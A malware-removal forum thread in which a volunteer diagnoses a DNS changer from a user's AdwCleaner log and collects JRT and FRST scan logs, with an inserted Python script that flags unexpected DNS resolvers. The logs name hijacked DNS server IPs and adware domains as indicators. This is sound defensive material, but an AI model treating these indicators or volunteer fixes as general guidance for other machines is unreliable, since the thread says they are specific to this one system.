Is it safe to get rid of these files?


  • This topic is locked
12 replies to this topic

#1 Neki

Posted 02 February 2016 - 05:59 AM

I have been using AdwCleaner for a while now and it does help a lot. Sometimes ads pop up in my browser and I would just run AdwCleaner and it fixes the problem. Every time before I do this, of course it shows the findings which it detected which are ready to be cleaned but the only boxes I left checked are the ones that are related to the ads that have been bugging my browser and didn't tamper with the ones that are related to the registry and other stuff because I don't even know what they are supposed to be. I left their boxes unchecked as I was nervous it might do something wrong with my registry (and other stuff too). Judging by the fact that AdwCleaner did detect them, should I delete these files? I would just like to know if it is safe to proceed with the cleaning. Here is my log:

 

# AdwCleaner v5.030 - Logfile created 02/02/2016 at 17:29:29
# Updated 17/01/2016 by Xplode
# Database : 2016-01-31.1 [Server]
# Operating system : Windows 8.1 Pro  (x64)
# Username : Neki - WIN8PC
# Running from : C:\Users\Neki\Desktop\Adwcleaner 5.030.exe
# Option : Scan
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
File Found : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
 
***** [ DLL ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
Key Found : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer] - 82.163.142.3 95.211.158.130
 
***** [ Web browsers ] *****
 
 
########## EOF - C:\AdwCleaner\AdwCleaner[S20].txt - [2443 bytes] ##########
 



#2 satchfan

  • Malware Response Team

Posted 02 February 2016 - 08:27 AM

Hello Neki and welcome to Bleeping Computer.

My name is Satchfan and I would be glad to help you with your computer problem.

Please read the following guidelines which will help to make cleaning your machine easier:

  • please follow all instructions in the order posted
  • please continue to review my answers until I tell you your machine appears to be clear. Absence of symptoms does not mean that everything is clear
  • all logs/reports, etc. must be posted in Notepad. Please ensure that word wrap is unchecked. In Notepad click Format, uncheck Word wrap if it is checked
  • if you don't understand something, please don't hesitate to ask for clarification before proceeding
  • the fixes are specific to your problem and should only be used for this issue on this machine.
  • please reply within 3 days. If you do not reply within this period I will post a reminder but topics with no reply in 4 days will be closed!

IMPORTANT:

Please DO NOT install/uninstall any programs unless asked to.
Please DO NOT run any scans other than those requested


You have a DNS changer and those entries need to be removed.

===================================================

Note: Please run these in the order given in the instructions.

===================================================

Run AdwCleaner


  • run AdwCleaner again
  • when it has finished, make sure ALL are selected and press Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

===================================================

Download and run Junkware Removal Tool

Please download Junkware Removal Tool to your desktop.

  • shut down your protection software now to avoid potential conflicts.
  • run the tool by double-clicking it. If you are using Windows Vista, 7, or 8, instead of double-clicking, right-click JRT.exe and select "Run as Administrator"
  • the tool will open and start scanning your system
  • please be patient as this can take a while to complete depending on your system's specifications
  • on completion, a log (JRT.txt) is saved to your desktop and will automatically open
  • post the contents of JRT.txt into your next message.

===================================================

Run Farbar Recovery Scan Tool

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to run the version compatible with your system. If you are not sure which version applies to your system, download both of them and try to run them. Only one of them will run on your system; that will be the right version.

  • right click to run as administrator (XP users click run after receipt of Windows Security Warning - Open File). When the tool opens click Yes to disclaimer.
  • press Scan button
  • it will produce a log called Frst.txt in the same directory the tool is run from
  • please copy and paste log back here.
  • the first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the Frst.txt into your reply.

Logs to include with next post:

AdwCleaner log
JRT.txt
Frst.txt
Addition.txt


Thanks

Satchfan

 


My help is always free of charge. If you are happy with the help provided, if you wish you can make a donation to buy me a beer.
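
Added example (not part of the original thread, and not code from AdwCleaner or FRST): a small Python triage script that pulls the `NameServer` / `DhcpNameServer` values out of the two log formats posted in this thread and flags resolvers that are neither private-range nor on an expected list, which is the pattern behind the "DNS changer" diagnosis above. The sample lines are copied from the thread's logs; the function names, the `expected` allowlist parameter and the "non-private means unexpected" heuristic are assumptions made for the example.

```python
import ipaddress
import re
from collections import defaultdict

# Sample input: lines copied from the AdwCleaner scan log (post #1) and the
# FRST "Internet" section (post #3) in this thread.
SAMPLE_LOG = r"""
Key Found : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer] - 82.163.142.3 95.211.158.130
Data Found : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer] - 82.163.142.3 95.211.158.130
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{5A115C14-3FF2-447F-87EA-98DFE0108439}: [DhcpNameServer] 192.168.8.1 192.168.8.1
"""

# AdwCleaner: "Data Found : <key> [NameServer] - <ip> <ip>"
ADW_RE = re.compile(
    r"^Data Found : (?P<key>.+?) \[(?P<value>NameServer)\] - (?P<ips>.+)$"
)
# FRST: "Tcpip\...: [DhcpNameServer] <ip> <ip>" (also matches [NameServer])
FRST_RE = re.compile(
    r"^(?P<key>Tcpip\\.+?): \[(?P<value>(?:Dhcp)?NameServer)\] (?P<ips>.+)$"
)


def parse_nameservers(log_text):
    """Return [(registry_key, value_name, [ip, ...]), ...] for DNS entries."""
    entries = []
    for raw in log_text.splitlines():
        line = raw.strip()
        match = ADW_RE.match(line) or FRST_RE.match(line)
        if not match:
            continue  # unrelated log line (e.g. "Key Found", section headers)
        # The Windows NameServer value is space- or comma-delimited.
        ips = re.split(r"[ ,]+", match.group("ips").strip())
        entries.append((match.group("key"), match.group("value"), ips))
    return entries


def is_unexpected(ip_text, expected=()):
    """Heuristic (assumption): a resolver is unexpected if it is not a valid
    IP, or is a public address the operator did not list as expected."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return True  # malformed value in a DNS setting deserves a look
    if ip_text in expected:
        return False
    return not (ip.is_private or ip.is_loopback or ip.is_link_local)


def find_unexpected_resolvers(log_text, expected=()):
    """Map each unexpected resolver IP to the (value_name, key) pairs that
    reference it, so static and DHCP-learned entries can be told apart."""
    findings = defaultdict(list)
    for key, value, ips in parse_nameservers(log_text):
        for ip in dict.fromkeys(ips):  # de-duplicate, keep log order
            if is_unexpected(ip, expected):
                findings[ip].append((value, key))
    return dict(findings)


if __name__ == "__main__":
    for ip, refs in find_unexpected_resolvers(SAMPLE_LOG).items():
        print(f"{ip}: referenced by {len(refs)} setting(s)")
        for value, key in refs:
            print(f"    [{value}] {key}")
```

Separating `NameServer` (statically written to the registry) from `DhcpNameServer` (learned from the DHCP lease) matters when reading the output: a resolver that persists only under `DhcpNameServer` after cleaning points at the lease or the router rather than the host's static settings.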


#3 Neki

  • Topic Starter

Posted 02 February 2016 - 12:26 PM

Greetings, Satchfan! First of all, thanks for replying as quickly as possible.
 

I have correctly followed every step that you've given me and I believe I was able to perform them successfully without any slip-ups.
Just like you asked, here are the logs:

 

[1] AdwCleaner Log ==================================================

 

# AdwCleaner v5.030 - Logfile created 02/02/2016 at 23:35:42
# Updated 17/01/2016 by Xplode
# Database : 2016-01-31.1 [Server]
# Operating system : Windows 8.1 Pro  (x64)
# Username : Neki - WIN8PC
# Running from : C:\Users\Neki\Desktop\Adwcleaner 5.030.exe
# Option : Cleaning
 
***** [ Services ] *****
 
 
***** [ Folders ] *****
 
 
***** [ Files ] *****
 
[-] File Deleted : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
 
***** [ DLLs ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Scheduled tasks ] *****
 
 
***** [ Registry ] *****
 
[-] Key Deleted : HKU\.DEFAULT\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer]
[-] Data Restored : HKLM\SYSTEM\CurrentControlSet\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B} [NameServer]
[-] Data Restored : HKLM\SYSTEM\ControlSet001\services\Tcpip\Parameters\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D} [NameServer]
 
***** [ Web browsers ] *****
 
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://websearch.searchsun.info/?pid=377&r=2014/05/10&hid=2754430170790600472&lg=EN&cc=PH&unqvl=52
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://websearch.searchoholic.info/?pid=20687&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://websearch.searchoholic.info/?pid=3755&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Startup_URLs] Deleted : hxxp://www.oursurfing.com/?type=hp&ts=1441799948&z=e48dcd92dcbe589d6d53b4fg2z3z5g7mbt2t2t8z8q&from=exp1&uid=WDCXWD5000LPVX-00V0TT0_WD-WX31A541316113161
[-] [C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences] [Extension] Deleted : dgpdioedihjhncjafcpgbbjdpbbkikmi
 
*************************
 
:: "Tracing" keys removed
:: Winsock settings cleared
 
########## EOF - C:\AdwCleaner\AdwCleaner[C9].txt - [3337 bytes] ##########
 

 

[2] JRT =============================================================

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.2 (01.06.2016)
Operating System: Windows 8.1 Pro x64 
Ran by Neki (Administrator) on Tue 02/02/2016 at 23:53:06.53
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 14 
 
Successfully deleted: C:\ProgramData\13782443717249391982 (Folder) 
Successfully deleted: C:\ProgramData\gWdsManProg (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Local\freefileviewer (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\chrome-extension_gdalhedleemkkdjddjgfjmcnbpejpapp_0.localstorage (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage-journal (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.azlyrics.com_0.localstorage (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.metrolyrics.com_0.localstorage-journal (File) 
Successfully deleted: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Local Storage\hxxp_www.metrolyrics.com_0.localstorage (File) 
Successfully deleted: C:\Users\Neki\AppData\Roaming\3909 (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Roaming\freefileviewer (Folder) 
Successfully deleted: C:\Windows\system32\Tasks\FreeFileViewerUpdateChecker (Task)
Successfully deleted: C:\Windows\Tasks\FreeFileViewerUpdateChecker.job (Task) 
Successfully deleted: C:\Program Files (x86)\freefileviewer (Folder) 
Successfully deleted: C:\Users\Neki\AppData\Roaming\appdataFr25.bin (File) 
 
 
 
Registry: 0 
 
 
 
 
 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 02/02/2016 at 23:55:19.95
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 

[3] Frst =============================================================

 

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-01-2016
Ran by Neki (administrator) on WIN8PC (03-02-2016 00:26:06)
Running from C:\Users\Neki\Desktop
Loaded Profiles: Neki (Available Profiles: Neki & DefaultAppPool)
Platform: Windows 8.1 Pro (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Wacom Technology, Corp.) C:\Program Files\Tablet\Wacom\WTabletServicePro.exe
() C:\ProgramData\Globe Tattoo Broadband\OnlineUpdate\ouc.exe
() C:\ProgramData\DatacardService\HWDeviceService64.exe
() C:\ProgramData\MobileBrServ\mbbService.exe
() C:\Program Files (x86)\Nonchalant Necessary\Nonchalant Necessary.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Huawei Technologies Co., Ltd.) C:\ProgramData\DatacardService\DCSHelper.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Student\Microsoft Student with Encarta Premium 2009 DVD\EDICT.EXE
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ===========================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [500936 2015-04-28] (Adobe Systems Incorporated)
HKLM\...\Run: [MouseDriver] => C:\Windows\system32\TiltWheelMouse.exe [241152 2013-04-09] (Pixart Imaging Inc)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [596528 2015-12-22] (Oracle Corporation)
Winlogon\Notify\igfxcui: C:\Windows\system32\igfxdev.dll (Intel Corporation)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [uTorrent] => C:\Users\Neki\AppData\Roaming\uTorrent\uTorrent.exe [2026520 2015-12-13] (BitTorrent Inc.)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [30877280 2014-12-11] (Skype Technologies S.A.)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [E06AXLRD_477047609] => "C:\Program Files (x86)\Microsoft Encarta\Encarta Premium DVD 2006\EDICT.EXE" -m
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [DAEMON Tools Ultra Agent] => C:\Program Files (x86)\DAEMON Tools Ultra\DTAgent.exe [3198224 2014-04-28] (Disc Soft Ltd)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [L09AXLRD_7252718] => C:\Program Files (x86)\Microsoft Student\Microsoft Student with Encarta Premium 2009 DVD\EDICT.EXE [351000 2008-06-03] (Microsoft Corporation)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [EPLTarget\P0000000000000000] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATII2E.EXE [283232 2015-01-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [EPLTarget\P0000000000000001] => C:\Windows\system32\spool\DRIVERS\x64\3\E_YATII2E.EXE [283232 2015-01-14] (SEIKO EPSON CORPORATION)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner64.exe [8358680 2015-06-02] (Piriform Ltd)
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {36857aaa-9935-11e4-8253-60eb69f30525} - "F:\setup.exe" 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {4f0e6d74-9aea-11e4-8254-68a3c44fd64f} - "F:\LaunchU3.exe" -a
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {8deef359-a3ce-11e4-825e-60eb69f30525} - "F:\AutoRun.exe" 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {d932a234-9fb0-11e4-825a-60eb69f30525} - "F:\AutoRun.exe" 
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\...\MountPoints2: {d932a28a-9fb0-11e4-825a-60eb69f30525} - "F:\AutoRun.exe" 
Startup: C:\Users\Neki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.lnk [2015-01-23]
ShortcutTarget: Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.lnk -> C:\ProgramData\{7f323ec5-58cb-c7f1-7f32-23ec558cfb15}\Download Adobe Photoshop CC 14.2 Final Multilanguage [ChingLiu] Torrent - KickassTorrents.exe (No File)
Startup: C:\Users\Neki\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Minecraft 1.8.3 TeamExtreme.lnk [2015-05-11]
ShortcutTarget: Minecraft 1.8.3 TeamExtreme.lnk -> C:\ProgramData\{f81caf50-5fb6-c129-f81c-caf505fbbd41}\Minecraft 1.8.3 TeamExtreme.exe (No File)
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{406A705B-F018-41AD-9EB9-152D0BB496C4}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{4356B432-099B-4AC4-AF72-0AF931463587}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{5A115C14-3FF2-447F-87EA-98DFE0108439}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{8984F05E-FDA0-417C-8570-34EE1AE866A0}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{A0F7A8DA-3A26-47D7-9924-BC5B3B02F30B}: [DhcpNameServer] 192.168.8.1 192.168.8.1
Tcpip\..\Interfaces\{B11E34DE-3195-4ACD-936C-53571FEA5C3D}: [DhcpNameServer] 82.163.142.3
Tcpip\..\Interfaces\{D309BDAB-419D-477A-857A-E5B82A014752}: [DhcpNameServer] 192.168.8.1 192.168.8.1
 
Internet Explorer:
==================
HKU\S-1-5-21-1800402837-2610492725-117470784-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://search.domaincentar.com/
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = 
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\ssv.dll [2016-01-29] (Oracle Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\jp2ssv.dll [2016-01-29] (Oracle Corporation)
 
FireFox:
========
FF ProfilePath: C:\Users\Neki\AppData\Roaming\Mozilla\Firefox\Profiles\tcl5pmwb.default-1441896843992
FF SelectedSearchEngine: Google
FF Homepage: hxxp://search.domaincentar.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_19_0_0_245.dll [2015-12-05] ()
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2015-03-09] (Adobe Systems)
FF Plugin: wacom.com/WacomTabletPlugin -> C:\Program Files\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_19_0_0_245.dll [2015-12-05] ()
FF Plugin-x32: @java.com/DTPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\dtplugin\npDeployJava1.dll [2016-01-29] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.71.2 -> C:\Program Files (x86)\Java\jre1.8.0_71\bin\plugin2\npjp2.dll [2016-01-29] (Oracle Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-01-10] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-01-30] (Google Inc.)
FF Plugin-x32: @wacom.com/wtPlugin,version=2.1.0.7 -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2015-03-09] (Adobe Systems)
FF Plugin-x32: wacom.com/WacomTabletPlugin -> C:\Program Files (x86)\TabletPlugins\npWacomTabletPlugin.dll [2014-03-25] (Wacom)
FF Plugin HKU\S-1-5-21-1800402837-2610492725-117470784-1001: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Neki\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-12-05] (Unity Technologies ApS)
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://websearch.searchsun.info/?pid=377&r=2014/05/10&hid=2754430170790600472&lg=EN&cc=PH&unqvl=52","hxxp://websearch.searchoholic.info/?pid=20687&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72","hxxp://websearch.searchoholic.info/?pid=3755&r=2014/12/17&hid=2754430170790600472&lg=EN&cc=PH&unqvl=72","hxxp://www.oursurfing.com/?type=hp&ts=1441799948&z=e48dcd92dcbe589d6d53b4fg2z3z5g7mbt2t2t8z8q&from=exp1&uid=WDCXWD5000LPVX-00V0TT0_WD-WX31A541316113161"
CHR DefaultSearchKeyword: Default -> google.com.ph_
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-09]
CHR Extension: (Google Docs) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-09]
CHR Extension: (Google Drive) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (YouTube) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-25]
CHR Extension: (Google Search) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-27]
CHR Extension: (Google Sheets) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-09]
CHR Extension: (Google Docs Offline) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-18]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-09-09]
CHR Extension: (My Chrome Theme) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\oehpjpccmlcalbenfhnacjeocbjdonic [2016-01-30]
CHR Extension: (Gmail) - C:\Users\Neki\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-09]
 
==================== Services (Whitelisted) ========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aspnet_state; C:\Windows\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [32768 2003-02-20] (Microsoft Corporation) [File not signed]
S3 Disc Soft Bus Service; C:\Program Files (x86)\DAEMON Tools Ultra\DiscSoftBusService.exe [813328 2014-04-28] (Disc Soft Ltd)
S2 Globe Tattoo Broadband. RunOuc; C:\Program Files (x86)\Globe Tattoo Broadband\UpdateDog\ouc.exe [218624 2015-01-19] () [File not signed]
R2 HWDeviceService64.exe; C:\ProgramData\DatacardService\HWDeviceService64.exe [339456 2010-11-16] () [File not signed]
S3 IDriverT; C:\Program Files (x86)\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [73728 2004-10-22] (Macrovision Corporation) [File not signed]
